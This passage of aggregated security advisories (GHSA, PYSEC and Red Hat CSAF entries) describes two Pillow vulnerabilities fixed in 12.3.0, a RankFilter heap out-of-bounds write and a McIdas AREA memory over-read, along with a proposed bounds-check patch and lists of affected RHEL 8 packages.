vulnerable public\n validation order and unchecked ImagingExpand arithmetic\nupstream/main at 9c1097c861420c77af53c7c9af2a1382e2bfaa8b: still affected\n```\n\n### Impact\n\nIt is a heap out-of-bounds write in Pillow\u0027s native C extension, reachable\nthrough public image-filter classes.\n\nApplications are impacted if an untrusted user can control the rank-filter\nsize/configuration passed to Pillow. If the image is also attacker-supplied, the\nsource pixel value written out of bounds can be attacker-influenced, including\n4-byte values for mode `\"I\"` images.\n\n\n## Possible fix\n\nValidate the rank-filter size before calling `image.expand(...)`, and harden\n`ImagingExpand()` against invalid margins and overflow:\n\n```c\nif (xmargin \u003c 0 || ymargin \u003c 0) {\n return (Imaging)ImagingError_ValueError(\"bad kernel size\");\n}\nif (xmargin \u003e (INT_MAX - imIn-\u003exsize) / 2 ||\n ymargin \u003e (INT_MAX - imIn-\u003eysize) / 2) {\n return (Imaging)ImagingError_ValueError(\"bad kernel size\");\n}\n```",
"id": "GHSA-xj96-63gp-2gmr",
"modified": "2026-07-20T23:08:58Z",
"published": "2026-07-20T23:08:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"type": "PACKAGE",
"url": "https://github.com/python-pillow/Pillow"
},
{
"type": "WEB",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Pillow: Heap out-of-bounds write in `ImageFilter.RankFilter` via integer overflow in `ImagingExpand`"
}
PYSEC-2026-3454
Vulnerability from pysec - Published: 2026-07-14 17:17 - Updated: 2026-07-22 09:57Pillow is a Python imaging library. Prior to 12.3.0, Pillow's public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.
| Name | purl | pillow | pkg:pypi/pillow |
|---|
{
"affected": [
{
"ecosystem_specific": {},
"package": {
"ecosystem": "PyPI",
"name": "pillow",
"purl": "pkg:pypi/pillow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "12.3.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.0",
"1.1",
"1.2",
"1.3",
"1.4",
"1.5",
"1.6",
"1.7.0",
"1.7.1",
"1.7.2",
"1.7.3",
"1.7.4",
"1.7.5",
"1.7.6",
"1.7.7",
"1.7.8",
"10.0.0",
"10.0.1",
"10.1.0",
"10.2.0",
"10.3.0",
"10.4.0",
"11.0.0",
"11.1.0",
"11.2.1",
"11.3.0",
"12.0.0",
"12.1.0",
"12.1.1",
"12.2.0",
"2.0.0",
"2.1.0",
"2.2.0",
"2.2.1",
"2.2.2",
"2.3.0",
"2.3.1",
"2.3.2",
"2.4.0",
"2.5.0",
"2.5.1",
"2.5.2",
"2.5.3",
"2.6.0",
"2.6.1",
"2.6.2",
"2.7.0",
"2.8.0",
"2.8.1",
"2.8.2",
"2.9.0",
"3.0.0",
"3.1.0",
"3.1.0.rc1",
"3.1.0rc1",
"3.1.1",
"3.1.2",
"3.2.0",
"3.3.0",
"3.3.1",
"3.3.2",
"3.3.3",
"3.4.0",
"3.4.1",
"3.4.2",
"4.0.0",
"4.1.0",
"4.1.1",
"4.2.0",
"4.2.1",
"4.3.0",
"5.0.0",
"5.1.0",
"5.2.0",
"5.3.0",
"5.4.0",
"5.4.0.dev0",
"5.4.1",
"6.0.0",
"6.1.0",
"6.2.0",
"6.2.1",
"6.2.2",
"7.0.0",
"7.1.0",
"7.1.1",
"7.1.2",
"7.2.0",
"8.0.0",
"8.0.1",
"8.1.0",
"8.1.1",
"8.1.2",
"8.2.0",
"8.3.0",
"8.3.1",
"8.3.2",
"8.4.0",
"9.0.0",
"9.0.1",
"9.1.0",
"9.1.1",
"9.2.0",
"9.3.0",
"9.4.0",
"9.5.0"
]
}
],
"aliases": [
"CVE-2026-59197",
"GHSA-xj96-63gp-2gmr"
],
"details": "Pillow is a Python imaging library. Prior to 12.3.0, Pillow\u0027s public rank-filter API can trigger a native heap out-of-bounds write when given a very large odd filter size because ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation and ImagingExpand() computes output dimensions with unchecked signed int arithmetic. This issue is fixed in version 12.3.0.",
"id": "PYSEC-2026-3454",
"modified": "2026-07-22T09:57:10.158882Z",
"published": "2026-07-14T17:17:14.487Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"type": "FIX",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"type": "FIX",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"type": "EVIDENCE",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
]
}
RHSA-2026:48021
Vulnerability from csaf_opensuse - Published: 2026-07-29 21:19 - Updated: 2026-08-04 22:36A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 | — |
Vendor Fix
fix
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:48021 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500057 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-54058 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500057 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54058 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54058 | external |
| https://github.com/python-pillow/Pillow/commit/6a… | external |
| https://github.com/python-pillow/Pillow/pull/9719 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-pillow is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.\n\nSecurity Fix(es):\n\n* Pillow: Pillow: Native heap out-of-bounds write (CVE-2026-59197)\n\n* Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image (CVE-2026-54058)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:48021",
"url": "https://access.redhat.com/errata/RHSA-2026:48021"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "2500057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500057"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_48021.json"
}
],
"title": "Red Hat Security Advisory: python-pillow security update",
"tracking": {
"current_release_date": "2026-08-04T22:36:01+00:00",
"generator": {
"date": "2026-08-04T22:36:01+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:48021",
"initial_release_date": "2026-07-29T21:19:12+00:00",
"revision_history": [
{
"date": "2026-07-29T21:19:12+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-07-29T21:19:12+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-04T22:36:01+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CRB (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-pillow-0:5.1.1-23.el8_10.src",
"product": {
"name": "python-pillow-0:5.1.1-23.el8_10.src",
"product_id": "python-pillow-0:5.1.1-23.el8_10.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow@5.1.1-23.el8_10?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python3-pillow-0:5.1.1-23.el8_10.s390x",
"product_id": "python3-pillow-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"product_id": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_id": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debuginfo@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_id": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
